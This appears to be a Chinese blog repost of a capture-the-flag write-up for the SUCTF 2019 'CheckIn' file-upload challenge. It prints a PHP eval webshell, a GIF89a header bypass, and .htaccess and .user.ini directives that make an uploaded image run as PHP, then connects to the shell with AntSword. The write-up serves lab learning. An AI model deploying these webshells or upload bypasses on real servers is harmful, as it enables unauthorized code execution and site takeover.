当前位置:网站首页>[SUCTF 2019]CheckIn (.htaccess和.user.ini)
[SUCTF 2019]CheckIn (.htaccess和.user.ini)
2022-08-09 23:19:00 【开心星人】
evil.php
<?php eval($_POST['evil'])?>
抓包修改Content-Type: image/jpeg
仍然是后缀名不合法
更改后缀名为php3、php4、phtml等都不行
将后缀名改成jpg(虽然绕过了,但是解析不了,所以没啥用)
换一个一句话木马
<script language="php">eval($_POST['evil'])</script>
进行了文件头的校验
GIF89a? <script language="php">eval($_POST['evil'])</script>
一般都是直接用这个就行了
成功了,但是无法解析
尝试.htaccess和.user.ini
.htaccess
<FilesMatch "evil.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
需要加个文件头绕过
GIF89a?
<FilesMatch "evil.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
意思是如果文件中有一个evil.jpg的文件,他就会被解析为.php
上传成功
访问evil.jpg即http://ec60414d-2ab8-462c-bb74-bc60f6a5597a.node4.buuoj.cn:81/uploads/uploads/c47b21fcf8f0bc8b3920541abd8024fd/evil.jpg
然后尝试使用antsword连接,但是发现连不上,不太确定哪里出了问题
尝试.user.ini
auto_prepend_file和auto_append_file
他们的作用就是指定一个文件(1.jpg),那么该文件就会被包含在要执行的php文件中(index.php)
.user.ini
GIF89a?
auto_prepend_file=evil.jpg
上传成功
但不知道什么原因(可能是时间限制,自动删除了),我们刚才上传的evil.jpg不在了,重新上传一下即可
然后访问http://ec60414d-2ab8-462c-bb74-bc60f6a5597a.node4.buuoj.cn:81/uploads/c47b21fcf8f0bc8b3920541abd8024fd/index.php
用antsword连接即可
边栏推荐
猜你喜欢
[Cloud native] Kubernetes orchestration tools
【集训DAY3】挖金矿【二分答案】
【集训DAY5】快速排序【模拟】【数学】
vmware Exsi 网卡配置
arm-4-裸板开发
阿雷的血压有些低
微信小程序获取微信用户步数
The technical aspects of the byte have been passed, and the salary has been negotiated for 20K*13, but the result is still being brushed. I asked the HR why...
服务发现@EnableDiscoveryClient
工程 (七) ——PolarSeg点云语义分割
随机推荐
YOLOV5学习笔记(七)——训练自己数据集
FreeRTOS任务基础
微信小程序获取微信用户步数
基于 RocksDB 实现高可靠、低时延的 MQTT 数据持久化
Distributed database problem (3): data consistency
framework源码读后感
多商户商城系统功能拆解25讲-平台端分销申请
知行合一的时候
【集训DAY3】中位数
第十五章 mysql存储过程与存储函数课后练习
ES6 Beginner to Mastery #15: Generator Usage
conda新建环境时报错NotWritableError: The current user does not have write permissions
上交所实时行情文件汇总
Qt 之 QDateEdit 和 QTimeEdit
数字钱包红海角逐,小程序生态快速引入可助力占领智慧设备入口
【云原生】Kubernetes编排工具精讲
【集训DAY5】堆箱子【数学】
蔚来杯2022牛客暑期多校训练营7 CFGJ
源码编译安装LAMP和LNMP
深入理解Aarch64内存管理